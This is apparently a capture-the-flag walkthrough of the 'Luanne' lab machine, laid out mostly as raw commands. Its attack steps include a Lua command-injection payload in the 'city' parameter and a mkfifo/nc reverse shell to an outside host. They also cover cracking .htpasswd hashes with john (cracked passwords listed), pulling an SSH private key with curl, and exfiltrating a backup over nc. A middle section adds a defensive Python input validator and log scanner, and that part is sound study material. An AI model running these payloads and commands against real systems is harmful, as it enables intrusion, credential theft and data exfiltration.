nmap -A -p- -oA output 10.129.151.88 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA luanne 10.129.151.88

nmap -sU -O -p- -oA luanne-udp 10.129.151.88

nikto -h 10.129.151.88 -p 80

whatweb http://10.129.151.88

http://10.129.151.88/robots.txt

wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.151.88/weather/FUZZ

http://10.129.151.88/weather/forecast

curl -s -X GET "http://10.129.151.88/weather/forecast?city=London" | jq

We open Burp Suite and intercept the request.

GET /weather/forecast?city=list

GET /weather/forecast?city=list']%3b+os.execute['id']--+-'

nc -lvnp 443

GET /weather/forecast?city=list']%3b+os.execute['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 443 >/tmp/f']--+-'

Press Ctrl+U in Burp to URL-encode the payload before sending it.
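From the defender's side, the takeaway of this step is that the `city` parameter is concatenated straight into Lua and that the injection leaves a very recognisable trace in the web server's access log. The following Python script is an added example (not part of the original writeup or the Luanne box) that does two things a practitioner would want: it validates `city` against a strict allow-list, and it scans access-log lines for the Lua fragments that appear in the requests above. The log format (Apache/nginx combined-style), the allow-list alphabet for city names and the three sample log lines are all assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not captured from the real box). The
# third line carries the same Lua-injection shape as the request in the writeup.
SAMPLE_LOG = """\
10.10.14.21 - - [03/Feb/2022:06:24:19 +0000] "GET /weather/forecast?city=London HTTP/1.1" 200 512
10.10.14.21 - - [03/Feb/2022:06:29:34 +0000] "GET /weather/forecast?city=list HTTP/1.1" 200 201
10.10.14.21 - - [03/Feb/2022:06:32:53 +0000] "GET /weather/forecast?city=list']%3b+os.execute['id']--+-' HTTP/1.1" 500 0
"""

# Combined-log-style line: source, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumed allow-list for a city name: letters, spaces, dots and hyphens only.
# Anything else is rejected before it can ever reach a Lua string literal.
CITY_OK = re.compile(r"[A-Za-z][A-Za-z .\-]{0,63}")

# Lua fragments that have no business in a city name; their presence turns a
# merely invalid value into an injection attempt worth alerting on.
LUA_MARKERS = ("os.execute", "io.popen", "--", "]", ";")


def city_param(target):
    """Return the decoded `city` query value from a request target, or None."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    vals = qs.get("city")
    return vals[0] if vals else None


def classify_city(value):
    """'ok' if the value passes the allow-list, 'invalid' if it merely fails it,
    'injection' if it also contains Lua syntax, 'missing' if absent."""
    if value is None:
        return "missing"
    if CITY_OK.fullmatch(value):
        return "ok"
    if any(marker in value for marker in LUA_MARKERS):
        return "injection"
    return "invalid"


def scan_log(text):
    """Scan access-log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a line we understand; skip rather than guess
        value = city_param(m["target"])
        verdict = classify_city(value)
        if verdict in ("injection", "invalid"):
            findings.append({
                "src": m["src"],
                "ts": m["ts"],
                "status": m["status"],
                "verdict": verdict,
                "city": value,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['verdict']:9} city={f['city']!r} status={f['status']}")
```

The `parse_qs` call already URL-decodes the value, so `%3b` becomes `;` and the `+` becomes a space, which is exactly the form the application would have seen. Keeping `invalid` and `injection` as separate verdicts means a legitimately odd city name such as `St. John's` is rejected by the allow-list without triggering an injection alert.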

cat .htpasswd

Save the webapi_user entry and its password hash to a file called hash.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Credentials -> webapi_user:iamthebest

ps -auwx

curl -s -X GET http://127.0.0.1:3001

curl -s -X GET http://127.0.0.1:3001/~r.michaels/id_rsa -u 'webapi_user:iamthebest'; echo

Create a local id_rsa file with the retrieved key.

chmod 600 id_rsa

ssh -i id_rsa r.michaels@10.129.151.88

cd backups

cat devel_backup-2020-09-16.tar.gz.enc

netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/backup.tar.gz

nc 10.10.14.21 443 < backup.tar.gz

nc -lvnp 443 > backup.tar.gz

cat .htpasswd

vim hash2

john --wordlist=/usr/share/wordlists/rockyou.txt hash2

Credentials -> root:littlebear

doas su root

boxes

copyright©2022 Cu3rv0x all rights reserved